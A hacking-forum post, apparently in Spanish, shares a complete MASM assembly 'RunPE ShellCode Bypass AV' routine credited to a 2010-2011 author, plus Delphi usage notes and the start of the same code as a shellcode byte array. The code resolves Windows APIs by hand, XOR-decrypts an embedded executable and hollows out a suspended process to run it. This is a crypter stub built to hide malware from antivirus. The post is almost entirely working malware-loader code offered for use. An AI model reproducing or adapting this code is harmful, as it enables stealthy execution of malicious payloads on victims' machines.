send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

RunPE NASM

  • 0 Respuestas
  • 653 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ragaza

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
« en: Abril 04, 2018, 06:01:24 am »
Código:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
.386
.model flat,stdcall
 
Comment *
 
[ RunPE ShellCode Bypass AV ] - {Private}
 
[ Coded By Coldzer0 _ AT4RE ] - [Delphi - MASM Coder]
 
[ 2010 - 2011 ]
 
[Skype : coldzer01 ] - [Yahoo : web.ghost@yahoo.com ]
 
[ Home : www.at4re.com  - www.mtcoders.com ]
 
{
Usage : [Delphi]
 
Make Var with
 
var
RunPE : procedure(Buffer:PChar;BufferLen:DWORD); stdcall;
 
#### then in code call it like this #########
 
 Begin
        RunPE := @ShellCode[1];
        RunPE(@TextFile[1],length(TextFile));
 end;
 
}
*
 
.code
 
start:
  PUSH EBP
  MOV EBP,ESP
  ADD ESP,-0378h
  PUSH EBX
  PUSH ESI
  PUSH EDI
 
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+28h] ; Get Module Path
 
;################# Extract Module Name [UNICODE] #################### 
  TEST EAX,EAX
AG: 
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,00h
  JE OK
  INC EAX
  INC EAX
  JMP AG
OK: 
  DEC EAX
  DEC EAX
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,5Ch ; '\'
  JE OK2
  JMP OK
OK2: 
  INC EAX
  INC EAX 
;################# Extract Module Name #################### 


;################# Convert to UpperCase ####################
MOV CX,WORD PTR DS:[EAX]
CMP CX,61h                                     
JS CHK 
SUB EAX,2
XOR EDI,EDI
UP:
MOV CX,WORD PTR DS:[EAX]
INC EDI
CMP CX,39h
JS LO
SUB CX,20h
LO:
MOV WORD PTR DS:[EAX],CX
ADD EAX,2
CMP CX,0
JNE UP
SUB EAX,EDI
SUB EAX,EDI
;################# Convert to UpperCase ####################


;################# Check Module Name [Kernel32 [UNICODE]] ######################
CHK:
MOV CX,WORD PTR DS:[EAX]
CMP CX,4Bh                                      ; K
JNZ AV
MOV CX,WORD PTR DS:[EAX+2h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+4h]
CMP ECX,52h                                     ; R
JNZ AV
MOV CX,WORD PTR DS:[EAX+6h]
CMP ECX,4Eh                                     ; N
JNZ AV
MOV CX,WORD PTR DS:[EAX+8h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ah]     
CMP ECX,4Ch                                     ; L
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ch]
CMP ECX,33h                                     ; 3
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Eh]
CMP ECX,32h                                     ; 2
JNZ AV
;********* Normal Mode *******
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+18h]
  JMP GO
;~~~~~~~~~~~ AV Mode ~~~~~~~~~~~
AV:
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX] ; First Module [AV]
  MOV EAX,DWORD PTR DS:[EAX] ; For AV [Kernel is Second Module]
  MOV EAX,DWORD PTR DS:[EAX+18h] 
;################# Check Module Name ######################
GO:     
  MOV DWORD PTR SS:[EBP-4h],EAX ; Save Kernel Base
  MOV BYTE PTR SS:[EBP-28h],47h
  MOV BYTE PTR SS:[EBP-27h],50h
  MOV BYTE PTR SS:[EBP-26h],41h
  XOR EAX,EAX
  MOV DWORD PTR SS:[EBP-14h],EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOV EDX,DWORD PTR DS:[EAX+78h]
  MOV DWORD PTR SS:[EBP-44h],EDX
  MOV EDX,DWORD PTR DS:[EAX+7Ch]
  MOV DWORD PTR SS:[EBP-40h],EDX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  ADD EAX,DWORD PTR SS:[EBP-44h]
  MOV ESI,DWORD PTR DS:[EAX+18h]
  DEC ESI
  TEST ESI,ESI
  JB LoadAPI
  INC ESI
  XOR EDX,EDX
LoopAPI:
  MOV ECX,DWORD PTR DS:[EAX+20h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  SHL EBX,2h
  ADD ECX,EBX
  MOV EDI,DWORD PTR DS:[ECX+0Ch]
  ADD EDI,DWORD PTR SS:[EBP-4h]
  MOV BL,BYTE PTR DS:[EDI]
  CMP BL,BYTE PTR SS:[EBP-28h]
  JNZ CheckAPI
  MOV BL,BYTE PTR DS:[EDI+3h]
  CMP BL,BYTE PTR SS:[EBP-27h]
  JNZ CheckAPI
  MOV CL,BYTE PTR DS:[EDI+7h]
  CMP CL,BYTE PTR SS:[EBP-26h]
  JNZ CheckAPI
  MOV ECX,DWORD PTR DS:[EAX+24h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  ADD EBX,EBX
  ADD ECX,EBX
  MOV CX,WORD PTR DS:[ECX]
  ADD CX,3h
  MOV EAX,DWORD PTR DS:[EAX+1Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOVZX ECX,CX
  SHL ECX,2h
  ADD EAX,ECX
  MOV ESI,DWORD PTR DS:[EAX]
  ADD ESI,DWORD PTR SS:[EBP-4h]
  MOV DWORD PTR SS:[EBP-14h],ESI
  JMP LoadAPI
CheckAPI:
  INC EDX
  DEC ESI
  JNZ LoopAPI
LoadAPI:                                                ; [ Write API To An Pointer - use later ]
  MOV BYTE PTR SS:[EBP-69h],47h 
  MOV BYTE PTR SS:[EBP-68h],65h
  MOV BYTE PTR SS:[EBP-67h],74h
  MOV BYTE PTR SS:[EBP-66h],4Dh
  MOV BYTE PTR SS:[EBP-65h],6Fh
  MOV BYTE PTR SS:[EBP-64h],64h
  MOV BYTE PTR SS:[EBP-63h],75h
  MOV BYTE PTR SS:[EBP-62h],6Ch
  MOV BYTE PTR SS:[EBP-61h],65h
  MOV BYTE PTR SS:[EBP-60h],48h
  MOV BYTE PTR SS:[EBP-5Fh],61h
  MOV BYTE PTR SS:[EBP-5Eh],6Eh
  MOV BYTE PTR SS:[EBP-5Dh],64h
  MOV BYTE PTR SS:[EBP-5Ch],6Ch
  MOV BYTE PTR SS:[EBP-5Bh],65h
  MOV BYTE PTR SS:[EBP-5Ah],41h
  MOV BYTE PTR SS:[EBP-59h],0h
  MOV BYTE PTR SS:[EBP-7Ch],47h
  MOV BYTE PTR SS:[EBP-7Bh],65h
  MOV BYTE PTR SS:[EBP-7Ah],74h
  MOV BYTE PTR SS:[EBP-79h],4Dh
  MOV BYTE PTR SS:[EBP-78h],6Fh
  MOV BYTE PTR SS:[EBP-77h],64h
  MOV BYTE PTR SS:[EBP-76h],75h
  MOV BYTE PTR SS:[EBP-75h],6Ch
  MOV BYTE PTR SS:[EBP-74h],65h
  MOV BYTE PTR SS:[EBP-73h],46h
  MOV BYTE PTR SS:[EBP-72h],69h
  MOV BYTE PTR SS:[EBP-71h],6Ch
  MOV BYTE PTR SS:[EBP-70h],65h
  MOV BYTE PTR SS:[EBP-6Fh],4Eh
  MOV BYTE PTR SS:[EBP-6Eh],61h
  MOV BYTE PTR SS:[EBP-6Dh],6Dh
  MOV BYTE PTR SS:[EBP-6Ch],65h
  MOV BYTE PTR SS:[EBP-6Bh],41h
  MOV BYTE PTR SS:[EBP-6Ah],0h
  MOV BYTE PTR SS:[EBP-91h],5Ah
  MOV BYTE PTR SS:[EBP-90h],77h
  MOV BYTE PTR SS:[EBP-8Fh],55h
  MOV BYTE PTR SS:[EBP-8Eh],6Eh
  MOV BYTE PTR SS:[EBP-8Dh],6Dh
  MOV BYTE PTR SS:[EBP-8Ch],61h
  MOV BYTE PTR SS:[EBP-8Bh],70h
  MOV BYTE PTR SS:[EBP-8Ah],56h
  MOV BYTE PTR SS:[EBP-89h],69h
  MOV BYTE PTR SS:[EBP-88h],65h
  MOV BYTE PTR SS:[EBP-87h],77h
  MOV BYTE PTR SS:[EBP-86h],4Fh
  MOV BYTE PTR SS:[EBP-85h],66h
  MOV BYTE PTR SS:[EBP-84h],53h
  MOV BYTE PTR SS:[EBP-83h],65h
  MOV BYTE PTR SS:[EBP-82h],63h
  MOV BYTE PTR SS:[EBP-81h],74h
  MOV BYTE PTR SS:[EBP-80h],69h
  MOV BYTE PTR SS:[EBP-7Fh],6Fh
  MOV BYTE PTR SS:[EBP-7Eh],6Eh
  MOV BYTE PTR SS:[EBP-7Dh],0h
  MOV BYTE PTR SS:[EBP-0A0h],56h
  MOV BYTE PTR SS:[EBP-9Fh],69h
  MOV BYTE PTR SS:[EBP-9Eh],72h
  MOV BYTE PTR SS:[EBP-9Dh],74h
  MOV BYTE PTR SS:[EBP-9Ch],75h
  MOV BYTE PTR SS:[EBP-9Bh],61h
  MOV BYTE PTR SS:[EBP-9Ah],6Ch
  MOV BYTE PTR SS:[EBP-99h],41h
  MOV BYTE PTR SS:[EBP-98h],6Ch
  MOV BYTE PTR SS:[EBP-97h],6Ch
  MOV BYTE PTR SS:[EBP-96h],6Fh
  MOV BYTE PTR SS:[EBP-95h],63h
  MOV BYTE PTR SS:[EBP-94h],45h
  MOV BYTE PTR SS:[EBP-93h],78h
  MOV BYTE PTR SS:[EBP-92h],0h
  MOV BYTE PTR SS:[EBP-0B1h],56h
  MOV BYTE PTR SS:[EBP-0B0h],69h
  MOV BYTE PTR SS:[EBP-0AFh],72h
  MOV BYTE PTR SS:[EBP-0AEh],74h
  MOV BYTE PTR SS:[EBP-0ADh],75h
  MOV BYTE PTR SS:[EBP-0ACh],61h
  MOV BYTE PTR SS:[EBP-0ABh],6Ch
  MOV BYTE PTR SS:[EBP-0AAh],50h
  MOV BYTE PTR SS:[EBP-0A9h],72h
  MOV BYTE PTR SS:[EBP-0A8h],6Fh
  MOV BYTE PTR SS:[EBP-0A7h],74h
  MOV BYTE PTR SS:[EBP-0A6h],65h
  MOV BYTE PTR SS:[EBP-0A5h],63h
  MOV BYTE PTR SS:[EBP-0A4h],74h
  MOV BYTE PTR SS:[EBP-0A3h],45h
  MOV BYTE PTR SS:[EBP-0A2h],78h
  MOV BYTE PTR SS:[EBP-0A1h],0h
  MOV BYTE PTR SS:[EBP-0C3h],52h
  MOV BYTE PTR SS:[EBP-0C2h],65h
  MOV BYTE PTR SS:[EBP-0C1h],61h
  MOV BYTE PTR SS:[EBP-0C0h],64h
  MOV BYTE PTR SS:[EBP-0BFh],50h
  MOV BYTE PTR SS:[EBP-0BEh],72h
  MOV BYTE PTR SS:[EBP-0BDh],6Fh
  MOV BYTE PTR SS:[EBP-0BCh],63h
  MOV BYTE PTR SS:[EBP-0BBh],65h
  MOV BYTE PTR SS:[EBP-0BAh],73h
  MOV BYTE PTR SS:[EBP-0B9h],73h
  MOV BYTE PTR SS:[EBP-0B8h],4Dh
  MOV BYTE PTR SS:[EBP-0B7h],65h
  MOV BYTE PTR SS:[EBP-0B6h],6Dh
  MOV BYTE PTR SS:[EBP-0B5h],6Fh
  MOV BYTE PTR SS:[EBP-0B4h],72h
  MOV BYTE PTR SS:[EBP-0B3h],79h
  MOV BYTE PTR SS:[EBP-0B2h],0h
  MOV BYTE PTR SS:[EBP-0D6h],57h
  MOV BYTE PTR SS:[EBP-0D5h],72h
  MOV BYTE PTR SS:[EBP-0D4h],69h
  MOV BYTE PTR SS:[EBP-0D3h],74h
  MOV BYTE PTR SS:[EBP-0D2h],65h
  MOV BYTE PTR SS:[EBP-0D1h],50h
  MOV BYTE PTR SS:[EBP-0D0h],72h
  MOV BYTE PTR SS:[EBP-0CFh],6Fh
  MOV BYTE PTR SS:[EBP-0CEh],63h
  MOV BYTE PTR SS:[EBP-0CDh],65h
  MOV BYTE PTR SS:[EBP-0CCh],73h
  MOV BYTE PTR SS:[EBP-0CBh],73h
  MOV BYTE PTR SS:[EBP-0CAh],4Dh
  MOV BYTE PTR SS:[EBP-0C9h],65h
  MOV BYTE PTR SS:[EBP-0C8h],6Dh
  MOV BYTE PTR SS:[EBP-0C7h],6Fh
  MOV BYTE PTR SS:[EBP-0C6h],72h
  MOV BYTE PTR SS:[EBP-0C5h],79h
  MOV BYTE PTR SS:[EBP-0C4h],0h
  MOV BYTE PTR SS:[EBP-0E7h],47h
  MOV BYTE PTR SS:[EBP-0E6h],65h
  MOV BYTE PTR SS:[EBP-0E5h],74h
  MOV BYTE PTR SS:[EBP-0E4h],54h
  MOV BYTE PTR SS:[EBP-0E3h],68h
  MOV BYTE PTR SS:[EBP-0E2h],72h
  MOV BYTE PTR SS:[EBP-0E1h],65h
  MOV BYTE PTR SS:[EBP-0E0h],61h
  MOV BYTE PTR SS:[EBP-0DFh],64h
  MOV BYTE PTR SS:[EBP-0DEh],43h
  MOV BYTE PTR SS:[EBP-0DDh],6Fh
  MOV BYTE PTR SS:[EBP-0DCh],6Eh
  MOV BYTE PTR SS:[EBP-0DBh],74h
  MOV BYTE PTR SS:[EBP-0DAh],65h
  MOV BYTE PTR SS:[EBP-0D9h],78h
  MOV BYTE PTR SS:[EBP-0D8h],74h
  MOV BYTE PTR SS:[EBP-0D7h],0h
  MOV BYTE PTR SS:[EBP-0F8h],53h
  MOV BYTE PTR SS:[EBP-0F7h],65h
  MOV BYTE PTR SS:[EBP-0F6h],74h
  MOV BYTE PTR SS:[EBP-0F5h],54h
  MOV BYTE PTR SS:[EBP-0F4h],68h
  MOV BYTE PTR SS:[EBP-0F3h],72h
  MOV BYTE PTR SS:[EBP-0F2h],65h
  MOV BYTE PTR SS:[EBP-0F1h],61h
  MOV BYTE PTR SS:[EBP-0F0h],64h
  MOV BYTE PTR SS:[EBP-0EFh],43h
  MOV BYTE PTR SS:[EBP-0EEh],6Fh
  MOV BYTE PTR SS:[EBP-0EDh],6Eh
  MOV BYTE PTR SS:[EBP-0ECh],74h
  MOV BYTE PTR SS:[EBP-0EBh],65h
  MOV BYTE PTR SS:[EBP-0EAh],78h
  MOV BYTE PTR SS:[EBP-0E9h],74h
  MOV BYTE PTR SS:[EBP-0E8h],0h
  MOV BYTE PTR SS:[EBP-0105h],52h
  MOV BYTE PTR SS:[EBP-0104h],65h
  MOV BYTE PTR SS:[EBP-0103h],73h
  MOV BYTE PTR SS:[EBP-0102h],75h
  MOV BYTE PTR SS:[EBP-0101h],6Dh
  MOV BYTE PTR SS:[EBP-0100h],65h
  MOV BYTE PTR SS:[EBP-0FFh],54h
  MOV BYTE PTR SS:[EBP-0FEh],68h
  MOV BYTE PTR SS:[EBP-0FDh],72h
  MOV BYTE PTR SS:[EBP-0FCh],65h
  MOV BYTE PTR SS:[EBP-0FBh],61h
  MOV BYTE PTR SS:[EBP-0FAh],64h
  MOV BYTE PTR SS:[EBP-0F9h],0h
  MOV BYTE PTR SS:[EBP-01Eh],6Eh
  MOV BYTE PTR SS:[EBP-01Dh],74h
  MOV BYTE PTR SS:[EBP-01Ch],64h
  MOV BYTE PTR SS:[EBP-01Bh],6Ch
  MOV BYTE PTR SS:[EBP-01Ah],6Ch
  MOV BYTE PTR SS:[EBP-019h],0h
  MOV BYTE PTR SS:[EBP-0114h],43h
  MOV BYTE PTR SS:[EBP-0113h],72h
  MOV BYTE PTR SS:[EBP-0112h],65h
  MOV BYTE PTR SS:[EBP-0111h],61h
  MOV BYTE PTR SS:[EBP-0110h],74h
  MOV BYTE PTR SS:[EBP-010Fh],65h
  MOV BYTE PTR SS:[EBP-010Eh],50h
  MOV BYTE PTR SS:[EBP-010Dh],72h
  MOV BYTE PTR SS:[EBP-010Ch],6Fh
  MOV BYTE PTR SS:[EBP-010Bh],63h
  MOV BYTE PTR SS:[EBP-010Ah],65h
  MOV BYTE PTR SS:[EBP-109h],73h
  MOV BYTE PTR SS:[EBP-108h],73h
  MOV BYTE PTR SS:[EBP-107h],41h
  MOV BYTE PTR SS:[EBP-0106h],0h
  MOV BYTE PTR SS:[EBP-121h],4Ch
  MOV BYTE PTR SS:[EBP-120h],6Fh
  MOV BYTE PTR SS:[EBP-11Fh],61h
  MOV BYTE PTR SS:[EBP-11Eh],64h
  MOV BYTE PTR SS:[EBP-11Dh],4Ch
  MOV BYTE PTR SS:[EBP-11Ch],69h
  MOV BYTE PTR SS:[EBP-11Bh],62h
  MOV BYTE PTR SS:[EBP-11Ah],72h
  MOV BYTE PTR SS:[EBP-119h],61h
  MOV BYTE PTR SS:[EBP-118h],72h
  MOV BYTE PTR SS:[EBP-117h],79h
  MOV BYTE PTR SS:[EBP-116h],41h
  MOV BYTE PTR SS:[EBP-115h],0h
  LEA EAX,DWORD PTR SS:[EBP-121h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-18h],EAX
  MOV ESI,DWORD PTR SS:[EBP+0Ch]
  DEC ESI
  TEST ESI,ESI
  JL CheckLen
  INC ESI
  XOR EBX,EBX
DeCryptPE:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV AL,BYTE PTR DS:[EAX+EBX]
  XOR AL,2Ah                                            ; XOR Key 1       [ You Can Change It But Should Crypt the File with the New Keys ]
  XOR AL,87h                                            ; XOR Key 2
  MOV EDX,DWORD PTR SS:[EBP+8h]
  MOV BYTE PTR DS:[EDX+EBX],AL
  INC EBX
  DEC ESI
  JNZ DeCryptPE
CheckLen:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV DWORD PTR SS:[EBP-54h],EAX
  LEA EAX,DWORD PTR SS:[EBP-69h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-7Ch]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV ESI,EAX
  PUSH 105
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0h
  CALL EBX
  PUSH EAX
  CALL ESI
  LEA EAX,DWORD PTR SS:[EBP-184h]
  MOV EBX,43h
GetS4C:
  MOV BYTE PTR DS:[EAX+EBX],0h
  DEC EBX
  CMP EBX,-1h
  JNZ GetS4C
  MOV DWORD PTR SS:[EBP-184h],44h
  LEA EAX,DWORD PTR SS:[EBP-114h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-184h]
  PUSH EAX
  PUSH 0h
  PUSH 0h
  PUSH 4h
  PUSH 0h
  PUSH 0h
  PUSH 0h
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0E7h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV DWORD PTR SS:[EBP-250h],10007h
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0C3h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-30h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-91h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-1Eh]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-18h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  MOV DWORD PTR SS:[EBP-2Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-0A0h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  PUSH 40h
  PUSH 3000h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+50h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV DWORD PTR SS:[EBP-38h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0D6h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-0Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  LEA EDI,DWORD PTR DS:[EAX+18h]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX EAX,WORD PTR DS:[EAX+14h]
  ADD EDI,EAX
  LEA EAX,DWORD PTR SS:[EBP-0B1h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-8h],EAX
  MOV DWORD PTR SS:[EBP-270h],1h
  MOV DWORD PTR SS:[EBP-26Ch],10h
  MOV DWORD PTR SS:[EBP-268h],2h
  MOV DWORD PTR SS:[EBP-264h],20h
  MOV DWORD PTR SS:[EBP-260h],4h
  MOV DWORD PTR SS:[EBP-25Ch],40h
  MOV DWORD PTR SS:[EBP-258h],4h
  MOV DWORD PTR SS:[EBP-254h],40h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX ESI,WORD PTR DS:[EAX+6h]
  DEC ESI
  TEST ESI,ESI
  JL CheckReadP
  INC ESI
  XOR EBX,EBX
ReadRPLoop:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+10h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+14h]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  LEA EAX,DWORD PTR SS:[EBP-3Ch]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+24h]
  SHR EAX,1Dh
  MOV EAX,DWORD PTR SS:[EBP+EAX*4h-270h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+8h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-8h]
  INC EBX
  DEC ESI
  JNZ ReadRPLoop
CheckReadP:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+28h]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  MOV DWORD PTR SS:[EBP-1A0h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0F8h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-105h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  POP EDI
  POP ESI
  POP EBX
  MOV ESP,EBP
  POP EBP
  RETN 8h
end start

Código en shellcode:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
NewRunPE {Bypass AV} : array [0..2376] of Byte =
(
$55,$8B,$EC,$81,$C4,$88,$FC,$FF,$FF,$53,$56,$57,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,
$00,$8B,$00,$8B,$40,$28,$85,$C0,$66,$8B,$08,$66,$83,$F9,$00,$74,$04,$40,$40,$EB,$F3,$48,$48,$66,$8B,
$08,$66,$83,$F9,$5C,$74,$02,$EB,$F3,$40,$40,$66,$8B,$08,$66,$83,$F9,$4B,$75,$54,$66,$8B,$48,$02,$83,
$F9,$45,$75,$4B,$66,$8B,$48,$04,$83,$F9,$52,$75,$42,$66,$8B,$48,$06,$83,$F9,$4E,$75,$39,$66,$8B,$48,
$08,$83,$F9,$45,$75,$30,$66,$8B,$48,$0A,$83,$F9,$4C,$75,$27,$66,$8B,$48,$0C,$83,$F9,$33,$75,$1E,$66,
$8B,$48,$0E,$83,$F9,$32,$75,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,
$40,$18,$EB,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$00,$8B,$40,$18,
$89,$45,$FC,$C6,$45,$D8,$47,$C6,$45,$D9,$50,$C6,$45,$DA,$41,$33,$C0,$89,$45,$EC,$8B,$45,$FC,$8B,$40,
$3C,$03,$45,$FC,$8B,$50,$78,$89,$55,$BC,$8B,$50,$7C,$89,$55,$C0,$8B,$45,$FC,$03,$45,$BC,$8B,$70,$18,
$4E,$85,$F6,$72,$5C,$46,$33,$D2,$8B,$48,$20,$03,$4D,$FC,$8B,$DA,$C1,$E3,$02,$03,$CB,$8B,$79,$0C,$03,
$7D,$FC,$8A,$1F,$3A,$5D,$D8,$75,$3B,$8A,$5F,$03,$3A,$5D,$D9,$75,$33,$8A,$4F,$07,$3A,$4D,$DA,$75,$2B,
$8B,$48,$24,$03,$4D,$FC,$8B,$DA,$03,$DB,$03,$CB,$66,$8B,$09,$66,$83,$C1,$03,$8B,$40,$1C,$03,$45,$FC,
$0F,$B7,$C9,$C1,$E1,$02,$03,$C1,$8B,$30,$03,$75,$FC,$89,$75,$EC,$EB,$04,$42,$4E,$75,$A7,$C6,$45,$97,
$47,$C6,$45,$98,$65,$C6,$45,$99,$74,$C6,$45,$9A,$4D,$C6,$45,$9B,$6F,$C6,$45,$9C,$64,$C6,$45,$9D,$75,
